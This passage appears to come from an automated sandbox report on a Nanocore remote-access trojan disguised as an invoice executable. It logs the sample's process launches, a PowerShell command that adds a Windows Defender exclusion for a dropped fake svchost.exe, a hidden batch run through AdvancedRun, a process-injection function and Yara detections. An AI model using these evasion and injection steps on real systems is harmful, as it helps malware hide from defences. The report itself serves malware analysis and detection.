Source: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe	Process created: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe' /SpecialRun 4101d8 744	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe' -Force
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 6200 -ip 6200
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6200 -s 2152

Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process created: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run			Jump to behavior

Source: explorer.exe, 0000000B.00000002.938982437.0000000000BE0000.00000002.00000001.sdmp, explorer.exe, 00000014.00000002.919876518.00000000014D0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 0000000B.00000002.938982437.0000000000BE0000.00000002.00000001.sdmp, explorer.exe, 00000014.00000002.919876518.00000000014D0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000B.00000002.938982437.0000000000BE0000.00000002.00000001.sdmp, explorer.exe, 00000014.00000002.919876518.00000000014D0000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000000B.00000002.938982437.0000000000BE0000.00000002.00000001.sdmp, explorer.exe, 00000014.00000002.919876518.00000000014D0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Queries volume information: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Queries volume information: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe VolumeInformation
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Queries volume information: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe VolumeInformation
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation

Source: C:\Users\user\AppData\Local\Temp\1f3ffc2d-f33f-4afa-bc9d-6e94ff3bd17f\AdvancedRun.exe

Code function: 7_2_0040A272 WriteProcessMemory,GetVersionExW,CreateRemoteThread,

7_2_0040A272

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000000.00000002.960780301.0000000004E97000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.948080441.0000000003121000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.921248174.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.971512779.0000000006AE1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.958135200.0000000005840000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.954247764.0000000004129000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.962261740.000000000532D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.958034068.0000000004250000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 6140, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 3524, type: MEMORY
Source: Yara match	File source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4eca200.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.svchost.exe.532d6f8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.CasPol.exe.5840000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.CasPol.exe.41745a5.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4e973e0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.svchost.exe.4250b50.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4e973e0.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.CasPol.exe.416b146.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.CasPol.exe.5844629.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.svchost.exe.4283970.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.CasPol.exe.5840000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.svchost.exe.532d6f8.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.svchost.exe.4250b50.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.CasPol.exe.416ff7c.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.CasPol.exe.416ff7c.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4eca200.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.svchost.exe.4283970.7.raw.unpack, type: UNPACKEDPE

Source: C:\Windows\explorer.exe	Directory queried: C:\Users\Public\Documents	Jump to behavior
Source: C:\Windows\explorer.exe	Directory queried: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk	Jump to behavior
Source: C:\Windows\explorer.exe	Directory queried: C:\Users\Public\Documents	Jump to behavior
Source: C:\Windows\explorer.exe	Directory queried: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk	Jump to behavior
Source: C:\Windows\explorer.exe	Directory queried: C:\Users\Public\Documents
Source: C:\Windows\explorer.exe	Directory queried: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk
Source: C:\Windows\explorer.exe	Directory queried: C:\Users\Public\Documents
Source: C:\Windows\explorer.exe	Directory queried: C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk

Remote Access Functionality:

Detected Nanocore Rat

Show sources

Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.960780301.0000000004E97000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: svchost.exe, 00000011.00000002.958034068.0000000004250000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost
Source: svchost.exe, 00000016.00000002.971512779.0000000006AE1000.00000004.00000001.sdmp	String found in binary or memory: NanoCore.ClientPluginHost

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000000.00000002.960780301.0000000004E97000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.948080441.0000000003121000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.921248174.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.971512779.0000000006AE1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.958135200.0000000005840000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.954247764.0000000004129000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.962261740.000000000532D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.958034068.0000000004250000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 6140, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 3524, type: MEMORY
Source: Yara match	File source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4eca200.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.svchost.exe.532d6f8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.CasPol.exe.5840000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.CasPol.exe.41745a5.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4e973e0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.svchost.exe.4250b50.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4e973e0.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.CasPol.exe.416b146.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.CasPol.exe.5844629.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.svchost.exe.4283970.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.CasPol.exe.5840000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.svchost.exe.532d6f8.6.unpack, type: UNPACKEDPE
